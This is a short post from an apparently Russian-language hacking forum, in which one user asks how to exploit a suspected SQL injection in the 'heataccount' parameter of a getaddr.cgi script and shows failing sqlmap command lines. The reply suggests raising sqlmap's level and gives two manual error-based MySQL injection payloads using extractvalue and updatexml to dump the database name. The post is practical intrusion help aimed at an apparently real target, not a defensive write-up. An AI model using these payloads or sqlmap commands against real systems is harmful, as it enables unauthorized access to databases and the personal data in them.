09.02.2018, 15:00
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от Sensoft
↑
Вопрос по SQL injection
Код:
GET /getaddr.cgi?heataccount=%5c
Spoiler: скриншот
Код:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Код:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит
Как раскрутить кто знает ?
level=5 попробуй в мапе, ну и руками error based вектор пробуй.
Код:
/getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
/getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
|
|
|